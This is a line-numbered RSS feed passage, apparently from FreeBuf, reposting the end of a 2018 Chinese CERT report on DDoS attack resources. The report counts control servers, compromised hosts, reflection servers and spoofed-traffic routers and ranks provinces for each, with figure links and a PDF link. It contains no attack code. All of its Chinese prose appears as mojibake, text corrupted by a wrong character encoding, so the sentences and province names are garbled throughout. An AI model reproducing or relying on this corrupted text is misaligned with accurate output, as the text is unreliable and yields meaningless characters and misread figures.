3673<p style="text-align: justify;">2017年以æ¥ï¼Œå…±ç›‘测å‘现我国境内535个曾ç»å‘起较大规模DDoS攻击的控制端资æºï¼Œä¸»è¦ä½äºŽæˆ‘国境内20个çœå¸‚,未å‘现ä½äºŽç”˜è‚ƒã€æ²³åŒ—ã€å‰æž—ã€å†…è’™å¤ã€å®å¤ã€é’æµ·ã€å±±ä¸œã€å±±è¥¿ã€è¥¿è—ã€æ–°ç–†ç‰çœå¸‚的控制端。</p>
3674</p>
3675<p style="text-align: justify;">å„çœå¸‚æŽ§åˆ¶ç«¯èµ„æºæ•°é‡çš„æœˆåº¦æŽ’åå˜åŒ–情况如图21所示。从图ä¸å¯ä»¥çœ‹å‡ºï¼Œé™•西ã€å¤©æ´¥ã€æ¹–北ã€é»‘龙江ã€å¹¿è¥¿ã€é‡åº†ã€æ¹–å—ç‰çœå¸‚çš„æŽ§åˆ¶ç«¯èµ„æºæŽ’åæ™®é排在åŽéƒ¨ï¼Œæˆ–æ˜¯è¿‘æœŸæ— å˜æ´»ï¼›ç¦å»ºã€å¹¿ä¸œã€æ±Ÿè‹ã€ä¸Šæµ·ç‰çœå¸‚çš„æŽ§åˆ¶ç«¯èµ„æºæŽ’åç›¸è¾ƒæœ‰ä¸€å®šçš„å¥½è½¬ï¼›åŒ—äº¬ã€æµ™æ±Ÿã€è´µå·žç‰çœå¸‚çš„æŽ§åˆ¶ç«¯èµ„æºæŽ’åæƒ…å†µç›¸è¾ƒæ— å¥½è½¬ã€æˆ–å˜åœ¨ä¸€å®šæ¶åŒ–。</p>
3676<p><img alt="è¿‘åŠå¹´å¢ƒå†…控制端所属çœä»½æŽ’åæƒ…况å˜åŒ–趋势" src="http://image.3001.net/images/20180724/15324142167781.png!small" width="690" height="334.97435897435895"></p>
3677<p style="text-align: center;">图21 è¿‘åŠå¹´å¢ƒå†…控制端所属çœä»½æŽ’åæƒ…况å˜åŒ–趋势</p>
3678</p>
3679<p style="text-align: justify;"><b>(2) 肉鸡资æº</b></p>
3680</p>
3681<p style="text-align: justify;">2017年以æ¥ï¼Œå…±ç›‘测å‘现我国境内1,700,146个曾ç»è¢«åˆ©ç”¨å‘起较大规模DDoS攻击的肉鸡资æºã€‚</p>
3682</p>
3683<p style="text-align: justify;">å„çœå¸‚è‚‰é¸¡èµ„æºæ•°é‡çš„æœˆåº¦æŽ’åå˜åŒ–情况如图22所示。从图ä¸å¯ä»¥çœ‹å‡ºï¼Œé’æµ·ã€å®å¤ã€è¥¿è—ã€ç”˜è‚ƒã€æµ·å—ã€å†…è’™å¤ã€å¹¿è¥¿ã€å¤©æ´¥ç‰çœå¸‚çš„è‚‰é¸¡èµ„æºæŽ’åæ™®é排在åŽéƒ¨ï¼Œæˆ–æ˜¯è¿‘æœŸæ— å˜æ´»ï¼›æ¹–å—ã€æ¹–åŒ—ã€æ±Ÿè¥¿ã€æ–°ç–†ã€é‡åº†ç‰çœå¸‚çš„è‚‰é¸¡èµ„æºæŽ’å相较有一定的好转;广东ã€ä¸Šæµ·ã€å±±ä¸œã€æ±Ÿè‹ã€æµ™æ±Ÿã€å±±è¥¿ç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åè¿‘å‡ æœˆç›¸è¾ƒæœ‰ä¸€å®šçš„å¥½è½¬ï¼Œä½†ä»æ™®é排在å‰åˆ—;北京ã€å››å·ã€é»‘é¾™æ±Ÿã€æ²³åŒ—ã€è´µå·žã€æ²³å—ç‰çœå¸‚çš„è‚‰é¸¡èµ„æºæŽ’åæƒ…å†µç›¸è¾ƒæ— å¥½è½¬ã€æˆ–å˜åœ¨ä¸€å®šæ¶åŒ–。</p>
3684<p><img alt="è¿‘åŠå¹´å¢ƒå†…肉鸡所属çœä»½æŽ’åæƒ…况å˜åŒ–趋势" src="http://image.3001.net/images/20180724/15324142392217.png!small" width="690" height="329.7448979591837"> </p>
3685</p>
3686<p style="text-align: center;">
3687</p>
3688<p style="text-align: center;">图22 è¿‘åŠå¹´å¢ƒå†…肉鸡所属çœä»½æŽ’åæƒ…况å˜åŒ–趋势</p>
3689</p>
3690<p style="text-align: justify;"><b>(3) åå°„æœåŠ¡å™¨èµ„æº</b></p>
3691</p>
3692<p style="text-align: justify;">2017年以æ¥ï¼Œå…±ç›‘测å‘现我国境内11,199,098个曾ç»è¢«åˆ©ç”¨å‘èµ·DDoSå射攻击的åå°„æœåŠ¡å™¨èµ„æºã€‚</p>
3693</p>
3694<p style="text-align: justify;">å„çœå¸‚åå°„æœåŠ¡å™¨èµ„æºæ•°é‡çš„æœˆåº¦æŽ’åå˜åŒ–情况如图23所示。从图ä¸å¯ä»¥çœ‹å‡ºï¼Œè¥¿è—ã€æµ·å—ã€å¹¿è¥¿ã€é’æµ·ã€ç”˜è‚ƒã€äº‘å—ã€ä¸Šæµ·ç‰çœå¸‚çš„åå°„æœåŠ¡å™¨èµ„æºæŽ’åæ™®é排在åŽéƒ¨ï¼Œæˆ–æ˜¯è¿‘æœŸæ— å˜æ´»ï¼›å››å·ã€å¤©æ´¥ã€å®å¤ã€è´µå·žã€æ¹–北ã€ç¦å»ºã€åŒ—äº¬ã€æ–°ç–†ç‰çœå¸‚çš„åå°„æœåŠ¡å™¨èµ„æºæŽ’å相较有一定的好转;山西ã€é»‘龙江ã€å‰æž—ã€æ²³åŒ—ã€å±±ä¸œç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åè¿‘å‡ æœˆç›¸è¾ƒæœ‰ä¸€å®šçš„å¥½è½¬ï¼Œä½†ä»æ™®é排在å‰åˆ—;辽å®ã€å¹¿ä¸œã€æ±Ÿè‹ã€å†…è’™å¤ã€æ²³å—ã€æµ™æ±Ÿã€é‡åº†ã€å®‰å¾½ã€æ¹–å—ç‰çœå¸‚çš„åå°„æœåŠ¡å™¨èµ„æºæŽ’åæƒ…å†µç›¸è¾ƒæ— å¥½è½¬ã€æˆ–å˜åœ¨ä¸€å®šæ¶åŒ–。</p>
3695<p><img alt=" è¿‘åŠå¹´å¢ƒå†…åå°„æœåŠ¡å™¨æ‰€å±žçœä»½æŽ’åæƒ…况å˜åŒ–趋势" src="http://image.3001.net/images/20180724/15324142535581.png!small" width="690" height="325.18581081081084"> </p>
3696</p>
3697<p style="text-align: center;">图23 è¿‘åŠå¹´å¢ƒå†…åå°„æœåŠ¡å™¨æ‰€å±žçœä»½æŽ’åæƒ…况å˜åŒ–趋势</p>
3698</p>
3699<p><b>(4) è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨èµ„æº</b></p>
3700</p>
3701<p style="text-align: justify;">2017年以æ¥ï¼Œå…±ç›‘测å‘现我国境内580个曾ç»è¢«åˆ©ç”¨è½¬å‘è·¨åŸŸä¼ªé€ æ”»å‡»æµé‡çš„è¿è¥å•†è·¯ç”±å™¨ã€‚主è¦ä½äºŽ28个çœå¸‚,未å‘现ä½äºŽå®å¤ã€è¥¿è—ç‰çœå¸‚的转å‘è·¨åŸŸä¼ªé€ æ”»å‡»æµé‡çš„è¿è¥å•†è·¯ç”±å™¨ã€‚</p>
3702</p>
3703<p style="text-align: justify;">å„çœå¸‚è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨èµ„æºæ•°é‡çš„æœˆåº¦æŽ’åå˜åŒ–情况如图24所示。从图ä¸å¯ä»¥çœ‹å‡ºï¼Œé’æµ·ã€é»‘龙江ã€é‡åº†ã€é™•西ã€å±±è¥¿ç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åæ™®é排在åŽéƒ¨ï¼Œæˆ–æ˜¯è¿‘æœŸæ— å˜æ´»ï¼›æ±Ÿè¥¿ã€ç¦å»ºã€è¾½å®ã€æ²³å—ã€æ²³åŒ—ã€ç”˜è‚ƒç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åç›¸è¾ƒæœ‰ä¸€å®šçš„å¥½è½¬ï¼›å¹¿ä¸œã€æµ™æ±Ÿã€ä¸Šæµ·ç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åè¿‘å‡ æœˆç›¸è¾ƒæœ‰ä¸€å®šçš„å¥½è½¬ï¼Œä½†ä»æ™®é排在å‰åˆ—ï¼›åŒ—äº¬ã€æ±Ÿè‹ã€å±±ä¸œã€è´µå·žã€å®‰å¾½ã€å†…è’™å¤ã€æ¹–å—ã€æ–°ç–†ç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åæƒ…å†µç›¸è¾ƒæ— å¥½è½¬ã€æˆ–å˜åœ¨ä¸€å®šæ¶åŒ–。</p>
3704</p>
3705<p><img alt="è¿‘åŠå¹´å¢ƒå†…è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨å½’属çœä»½æŽ’åæƒ…况å˜åŒ–趋势" src="http://image.3001.net/images/20180724/15324142676442.png!small" width="690" height="327.77969018932873"> </p>
3706</p>
3707<p style="text-align: center;">图24 è¿‘åŠå¹´å¢ƒå†…è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨å½’属çœä»½æŽ’åæƒ…况å˜åŒ–趋势</p>
3708</p>
3709<p><b>(5) æœ¬åœ°ä¼ªé€ æ¥æºè·¯ç”±å™¨èµ„æº</b></p>
3710</p>
3711<p style="text-align: justify;">2017年以æ¥ï¼Œå…±ç›‘测å‘现我国境内1,081个曾ç»è¢«åˆ©ç”¨è½¬å‘æœ¬åŒºåŸŸä¼ªé€ æ”»å‡»æµé‡çš„è¿è¥å•†è·¯ç”±å™¨ã€‚</p>
3712</p>
3713<p style="text-align: justify;">å„çœå¸‚æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨èµ„æºæ•°é‡çš„æœˆåº¦æŽ’åå˜åŒ–情况如图25所示。从图ä¸å¯ä»¥çœ‹å‡ºï¼Œé’æµ·ã€è¥¿è—ã€æµ·å—ã€å¤©æ´¥ã€å†…è’™å¤ã€é‡åº†ã€å¹¿è¥¿ã€ç”˜è‚ƒã€å‰æž—ã€é»‘龙江ç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åæ™®é排在åŽéƒ¨ï¼Œæˆ–æ˜¯è¿‘æœŸæ— å˜æ´»ï¼›å®‰å¾½ã€ä¸Šæµ·ã€å››å·ã€æ¹–北ã€è¾½å®ã€äº‘å—ã€æ±Ÿè¥¿ã€æ–°ç–†ç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åç›¸è¾ƒæœ‰ä¸€å®šçš„å¥½è½¬ï¼›è´µå·žã€æµ™æ±Ÿç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åè¿‘å‡ æœˆç›¸è¾ƒæœ‰ä¸€å®šçš„å¥½è½¬ï¼Œä½†ä»æ™®é排在å‰åˆ—;江è‹ã€åŒ—京ã€å¹¿ä¸œã€é™•è¥¿ã€æ¹–å—ã€å±±è¥¿ã€å±±ä¸œã€æ²³åŒ—ã€æ²³å—ç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åæƒ…å†µç›¸è¾ƒæ— å¥½è½¬ã€æˆ–å˜åœ¨ä¸€å®šæ¶åŒ–。</p>
3714<p><img alt="è¿‘åŠå¹´å¢ƒå†…æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨å½’属çœä»½æŽ’åæƒ…况å˜åŒ–趋势" src="http://image.3001.net/images/20180724/1532414280565.png!small" width="690" height="332.61538461538464"> </p>
3715</p>
3716<p style="text-align: center;">图25 è¿‘åŠå¹´å¢ƒå†…æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨å½’属çœä»½æŽ’åæƒ…况å˜åŒ–趋势</p>
3717</p>
3718<p style="text-align: justify;">阅读原文,请点击以下链接:<a href="http://www.cert.org.cn/publish/main/upload/File/DDoS201806.pdf">http://www.cert.org.cn/publish/main/upload/File/DDoS201806.pdf</a></p>
3719<p style="text-align: justify;"><b style="color: rgb(159, 163, 168);">*本文作者:任å行,转载请注明æ¥è‡ª FreeBuf.COM </b></p>
3720]]></content:encoded>
3721 <wfw:commentRss>http://www.freebuf.com/articles/paper/178568.html/feed</wfw:commentRss>
3722 <slash:comments>1</slash:comments>
3723 </item>
3724 </channel>
3725</rss>
3726
3727<!-- Dynamic page generated in 1.383 seconds. -->
3728<!-- Cached page generated by WP-Super-Cache on 2018-07-26 16:32:03 -->
3729
3730<!-- Super Cache dynamic page detected but late init not set. See the readme.txt for further details. -->
3731<!-- Dynamic Legacy Super Cache -->